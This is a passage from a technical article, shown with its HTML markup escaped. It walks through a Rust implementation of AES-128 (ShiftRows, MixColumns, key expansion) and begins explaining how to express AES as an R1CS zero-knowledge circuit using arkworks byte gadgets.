&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &#x2F;&#x2F;  [b0, b4, b8, b12],&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &#x2F;&#x2F;  [b1, b5, b9, b13],&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &#x2F;&#x2F;  [b2, b6, b10,b14],&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &#x2F;&#x2F;  [b3, b7, b11,b15]&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &#x2F;&#x2F;]&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let mut state_matrix = [[0_u8; 4]; 4];&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    for (i, state) in state_matrix.iter_mut().enumerate() {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        *state = [&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            *(bytes.get(i).context(&amp;quot;Out of bounds&amp;quot;)?),&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            *(bytes.get(i + 4).context(&amp;quot;Out of bounds&amp;quot;)?),&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            *(bytes.get(i + 8).context(&amp;quot;Out of bounds&amp;quot;)?),&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            *(bytes.get(i + 12).context(&amp;quot;Out of bounds&amp;quot;)?),&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        ];&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    }&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &#x2F;&#x2F; Rotate every state matrix row (u8 array) as specified by&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &#x2F;&#x2F; the AES cipher algorithm.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    for (rotations, row) in state_matrix.iter_mut().enumerate() {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        &#x2F;&#x2F; For the moment, this operation does not generate constraints in the&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        &#x2F;&#x2F; circuit, but it should in the future.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        row.rotate_left(rotations);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    }&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &#x2F;&#x2F; Turn the rotated arrays into a flattened&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &#x2F;&#x2F; 16-byte array, ordered by column.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let mut flattened_matrix = [0_u8; 16];&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    for i in 0..4 {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        for j in 0..4 {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            *flattened_matrix&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;                .get_mut((i * 4) + j)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;                .to_anyhow(&amp;quot;Error getting element of flattened_matrix slice&amp;quot;)? = *state_matrix&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;                .get(j)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;                .to_anyhow(&amp;quot;Error getting element of state_matrix&amp;quot;)?&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;                .get(i)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;                .to_anyhow(&amp;quot;Error getting element of state_matrix&amp;quot;)?;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        }&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    }&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    Ok(flattened_matrix)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;}&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;&lt;h3 id=&quot;mixcolumns&quot;&gt;MixColumns&lt;&#x2F;h3&gt;
&lt;p&gt;The MixColumns function operates on each column of the state matrix. Every four-byte column is interpreted as a polynomial of degree less than four with coefficients in $GF(2^8)$, which is multiplied by a fixed polynomial modulo $x^4+1$. In practice, each output byte is a linear combination of the column bytes, where each byte is multiplied by 1, 2 or 3 in Rijndael&amp;#39;s Galois field. If a multiplication overflows the byte, we reduce the result by the irreducible polynomial, similar to what we did in substitute bytes.&lt;&#x2F;p&gt;
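&lt;p&gt;As a quick standalone sketch of this field arithmetic (plain Rust, independent of the implementation below; the helper names are ours): doubling a byte is a left shift followed by a conditional reduction by 0x1B, and tripling is a doubling XORed with the original byte.&lt;&#x2F;p&gt;

```rust
// Multiplication by 2 in Rijndael's Galois field GF(2^8):
// shift left and, if the high bit overflowed, reduce by the
// irreducible polynomial x^8 + x^4 + x^3 + x + 1 (0x1B).
fn gf_mul2(a: u8) -> u8 {
    let overflow = a >> 7; // high bit of a: 0 or 1
    // wrapping_mul(2) is the left shift truncated to 8 bits
    a.wrapping_mul(2) ^ (overflow * 0x1B)
}

// Multiplication by 3: since 3 = 2 + 1, this is 2*a XOR a.
fn gf_mul3(a: u8) -> u8 {
    gf_mul2(a) ^ a
}
```

&lt;p&gt;For example, doubling 0x57 gives 0xAE (no reduction needed), while doubling 0xAE overflows and reduces to 0x47.&lt;&#x2F;p&gt;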
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;fn gmix_column(input: [u8; 4]) -&amp;gt; Option&amp;lt;[u8; 4]&amp;gt; {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let mut b: [u8; 4] = [0; 4];&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &#x2F;* The array &amp;#39;b&amp;#39; holds each element of &amp;#39;input&amp;#39; multiplied by 2&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;     * in Rijndael&amp;#39;s Galois field.&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;     * input[n] ^ b[n] is element n multiplied by 3 in Rijndael&amp;#39;s Galois field *&#x2F;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    for (i, c) in input.iter().enumerate() {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        let h = (c &amp;gt;&amp;gt; 7_usize) &amp;amp; 1; &#x2F;* extract the high bit: 1 if doubling c would overflow the byte *&#x2F;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        *b.get_mut(i)? = (c &amp;lt;&amp;lt; 1_usize) ^ (h * 0x1B); &#x2F;* the shift implicitly drops the high bit because b[i] is 8 bits wide, so we xor by 0x1b instead of 0x11b *&#x2F;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        &#x2F;* Rijndael&amp;#39;s Galois field *&#x2F;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    }&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    Some([&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        b.first()? ^ input.get(3)? ^ input.get(2)? ^ b.get(1)? ^ input.get(1)?,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        b.get(1)? ^ input.first()? ^ input.get(3)? ^ b.get(2)? ^ input.get(2)?,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        b.get(2)? ^ input.get(1)? ^ input.first()? ^ b.get(3)? ^ input.get(3)?,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        b.get(3)? ^ input.get(2)? ^ input.get(1)? ^ b.first()? ^ input.first()?,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    ])&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;}&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;pub fn mix_columns(input: &amp;amp;[u8; 16]) -&amp;gt; Option&amp;lt;[u8; 16]&amp;gt; {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let mut ret = [0_u8; 16];&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    for (pos, column) in input.chunks(4).enumerate() {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        let column_aux = [&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            *column.first()?,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            *column.get(1)?,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            *column.get(2)?,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            *column.get(3)?,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        ];&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        let column_ret = gmix_column(column_aux)?;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        &#x2F;&#x2F; put column_ret in ret:&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        *ret.get_mut(pos * 4)? = *column_ret.first()?;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        *ret.get_mut(pos * 4 + 1)? = *column_ret.get(1)?;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        *ret.get_mut(pos * 4 + 2)? = *column_ret.get(2)?;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        *ret.get_mut(pos * 4 + 3)? = *column_ret.get(3)?;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    }&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    Some(ret)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;}&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;&lt;h3 id=&quot;key-scheduling&quot;&gt;Key scheduling&lt;&#x2F;h3&gt;
&lt;p&gt;This function derives the round keys from the master key.&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;pub fn derive_keys(secret_key: &amp;amp;[u8; 16]) -&amp;gt; Result&amp;lt;[[u8; 16]; 11]&amp;gt; {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    const ROUND_CONSTANTS: [u32; 10] = [&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        u32::from_be_bytes([0x01, 0x00, 0x00, 0x00]),&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        u32::from_be_bytes([0x02, 0x00, 0x00, 0x00]),&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        u32::from_be_bytes([0x04, 0x00, 0x00, 0x00]),&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        u32::from_be_bytes([0x08, 0x00, 0x00, 0x00]),&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        u32::from_be_bytes([0x10, 0x00, 0x00, 0x00]),&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        u32::from_be_bytes([0x20, 0x00, 0x00, 0x00]),&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        u32::from_be_bytes([0x40, 0x00, 0x00, 0x00]),&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        u32::from_be_bytes([0x80, 0x00, 0x00, 0x00]),&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        u32::from_be_bytes([0x1B, 0x00, 0x00, 0x00]),&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        u32::from_be_bytes([0x36, 0x00, 0x00, 0x00]),&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    ];&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let mut result = [0_u32; 44];&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    result[0] = to_u32(&amp;amp;secret_key[..4]).to_anyhow(&amp;quot;Error converting to u32&amp;quot;)?;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    result[1] = to_u32(&amp;amp;secret_key[4..8]).to_anyhow(&amp;quot;Error converting to u32&amp;quot;)?;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    result[2] = to_u32(&amp;amp;secret_key[8..12]).to_anyhow(&amp;quot;Error converting to u32&amp;quot;)?;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    result[3] = to_u32(&amp;amp;secret_key[12..16]).to_anyhow(&amp;quot;Error converting to u32&amp;quot;)?;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    for i in 4..44 {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        if i % 4 == 0 {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            let substituted_and_rotated = to_u32(&amp;amp;substitute_word(rotate_word(&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;                *result.get(i - 1).to_anyhow(&amp;quot;Error getting elem&amp;quot;)?,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            ))?)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            .to_anyhow(&amp;quot;Error converting to u32&amp;quot;)?;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            *result.get_mut(i).to_anyhow(&amp;quot;Error getting elem&amp;quot;)? =&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;                (result.get(i - 4).to_anyhow(&amp;quot;Error getting elem&amp;quot;)? ^ (substituted_and_rotated))&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;                    ^ ROUND_CONSTANTS&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;                        .get(i &#x2F; 4 - 1)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;                        .to_anyhow(&amp;quot;Error getting elem&amp;quot;)?;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        } else {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            *result.get_mut(i).to_anyhow(&amp;quot;Error getting elem&amp;quot;)? =&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;                result.get(i - 4).to_anyhow(&amp;quot;Error getting elem&amp;quot;)?&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;                    ^ result.get(i - 1).to_anyhow(&amp;quot;Error getting elem&amp;quot;)?;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        }&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    }&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let mut ret = [[0_u8; 16]; 11];&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    for (i, elem) in result.chunks(4).enumerate() {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        elem.iter()&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            .flat_map(|e| e.to_be_bytes())&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;            .collect_slice(&amp;amp;mut ret.get_mut(i).to_anyhow(&amp;quot;Error getting elem&amp;quot;)?[..]);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    }&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    Ok(ret)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;}&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;fn to_u32(value: &amp;amp;[u8]) -&amp;gt; Option&amp;lt;u32&amp;gt; {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let array_aux: [u8; 4] = [&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        *value.first()?,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        *value.get(1)?,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        *value.get(2)?,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        *value.get(3)?,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    ];&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    Some(u32::from_be_bytes(array_aux))&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;}&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;fn rotate_word(input: u32) -&amp;gt; [u8; 4] {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let bytes: [u8; 4] = input.to_be_bytes();&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    [&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        *bytes.get(1).unwrap_or(&amp;amp;0),&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        *bytes.get(2).unwrap_or(&amp;amp;0),&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        *bytes.get(3).unwrap_or(&amp;amp;0),&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        *bytes.first().unwrap_or(&amp;amp;0),&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    ]&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;}&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;&lt;h2 id=&quot;circuits-and-gadgets&quot;&gt;Circuits and gadgets&lt;&#x2F;h2&gt;
&lt;p&gt;Hardcoding the whole AES circuit by hand would be impractical, given the number and variety of operations we have to perform. For example, suppose we want to perform the XOR operation between one byte of the message and the round key, $st[i] \oplus rk[i]=st^\prime [i]$. First, we need to decompose each byte into its constituent bits and check that each of them is indeed either $0$ or $1$:&lt;br &#x2F;&gt;
$st[i,j]\times st[i,j]=st[i,j]$&lt;br &#x2F;&gt;
$rk[i,j]\times rk[i,j]=rk[i,j]$&lt;br &#x2F;&gt;
$st^\prime[i,j]\times st^\prime[i,j]=st^\prime[i,j]$&lt;br &#x2F;&gt;
Next, we need to compute the XOR operation between bits,&lt;br &#x2F;&gt;
$2st[i,j]\times rk[i,j]=st[i,j]+rk[i,j]-st^\prime[i,j]$&lt;br &#x2F;&gt;
We have four constraints per bit and eight bits per byte, so a single byte XOR costs 32 constraints (we could drop the booleanity checks on $st^\prime$, since the XOR constraint already forces the result to be $0$ or $1$, reducing the count to 24). Every add round key function takes 16 bytes, so that is 512 (or 384) constraints per round!&lt;&#x2F;p&gt;
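&lt;p&gt;The XOR constraint above is just the arithmetic identity $a \oplus b = a + b - 2ab$ for bits. A tiny sanity check in plain Rust (an illustrative helper, not part of the circuit code):&lt;&#x2F;p&gt;

```rust
// For bits a, b in {0, 1}, the R1CS constraint
// 2*a*b = a + b - (a XOR b) holds: both sides agree
// on all four input combinations.
fn xor_constraint_holds(a: u8, b: u8) -> bool {
    let lhs = 2 * a * b;
    let rhs = a + b - (a ^ b);
    lhs == rhs
}
```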
&lt;p&gt;We can implement a gadget that adds the constraints corresponding to its binary decomposition whenever we define a new byte variable. We can also implement an XOR gadget between bytes, adding the constraints for the operation. The following code makes use of gadgets for &lt;code&gt;u8&lt;&#x2F;code&gt;:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;use ark_r1cs_std::bits::uint8::UInt8;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;let a = UInt8::new_input(cs, || Ok(1))?;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;let result = a.xor(&amp;amp;a)?;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;let zero = UInt8::constant(0);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
